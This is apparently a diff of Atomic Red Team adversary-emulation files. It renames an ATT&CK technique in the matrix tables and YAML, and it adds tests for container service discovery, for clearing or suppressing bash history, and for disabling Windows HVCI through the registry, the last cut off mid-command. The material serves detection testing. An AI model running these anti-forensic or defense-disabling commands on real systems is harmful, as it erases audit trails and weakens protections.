+|  |  | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -30,7 +30,7 @@
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -40,7 +40,7 @@
 |  | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Inter-Process Communication](../../T1559/T1559.md) | Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery](../../T1518/T1518.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal Application Access Token](../../T1528/T1528.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -34,7 +34,7 @@
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | [Encrypted Channel](../../T1573/T1573.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Scanning](../../T1046/T1046.md) |  |  |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
+|  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Indirect Command Execution](../../T1202/T1202.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -53462,7 +53462,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -53130,7 +53130,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -53146,7 +53146,44 @@ discovery:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1046
-    atomic_tests: []
+    atomic_tests:
+    - name: Network Service Discovery for Containers
+      auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+      description: Attackers may try to obtain a list of services that are operating
+        on remote hosts and local network infrastructure devices, in order to identify
+        potential vulnerabilities that can be exploited through remote software attacks.
+        They typically use tools to conduct port and vulnerability scans in order
+        to obtain this information.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
+          docker run --name t1046_container  -d -t t1046
+          docker exec t1046_container ./test.sh
+        cleanup_command: |-
+          docker stop t1046_container
+          docker rmi -f t1046
+        name: sh
  T1518:
    technique:
      x_mitre_platforms:
@@ -52638,7 +52638,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -52482,7 +52482,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -52819,7 +52819,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -53137,7 +53137,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -52638,7 +52638,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -16605,6 +16605,115 @@ defense-evasion:
          3. ls
          4. whoami > recon.txt
        name: manual
+    - name: Clear bash history
+      auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+      description: "An attacker may clear the bash history cache and the history file
+        as their last act before logging off to remove the record of their command
+        line activities. \n\nIn this test we use the $HISTFILE variable throughout
+        to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
+        the file is empty 6 clear the history cache 7. confirm the history cache is
+        empty. This is when the attacker would logoff.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
+          fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
+          is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
+          [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
+        cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
+    - name: Setting the HISTCONTROL environment variable
+      auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+      description: "An attacker may exploit the space before a command (e.g. \" ls\")
+        or the duplicate command suppression feature in Bash history to prevent their
+        commands from being recorded in the history file or to obscure the order of
+        commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
+        the history cache 3. executes ls -la with a space in-front of it 4. confirms
+        that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
+        6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
+        that their is only one command in history\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
+          ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
+          # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
+          -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
+          [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
+          fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
+          [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
+          -la $HISTFILE\"; fi\n"
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILESIZE environment variable
+      auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+      description: |
+        An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILESIZE)
+          echo $HISTFILESIZE
+          export HISTFILESIZE=0
+          if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+          # -> $HISTFILESIZE is zero
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILE environment variable
+      auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+      description: |
+        An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILE)
+          echo $HISTFILE
+          export HISTFILE="/dev/null"
+          if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+          # -> $HISTFILE is /dev/null
+        cleanup_command: 'export HISTFILE=$(echo $TEST)
+
+          '
+    - name: Setting the HISTIGNORE environment variable
+      auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+      description: "An Adversary may take advantage of the HISTIGNORE environment
+        variable either to ignore particular commands or all commands. \n\nIn this
+        test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
+        history cache 3..4 execute ls commands 5. confirm that the ls commands are
+        not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
+        ignoring ALL commands.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
+          ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
+          are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
+          ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
+          HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
+          = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
+          \"History cache is empty\"; fi\n# -> History cache is empty\n"
+        cleanup_command: 'unset HISTIGNORE
+
+          '
  T1497.002:
    technique:
      x_mitre_platforms:
@@ -18984,6 +19093,52 @@ defense-evasion:
          sync
        name: sh
        elevation_required: true
+    - name: Disable Hypervisor-Enforced Code Integrity (HVCI)
+      auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
+      description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
+        setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
+        \"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
+        HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
+        Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'HVCI must be enabled
+
+          '
+        prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
+          2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
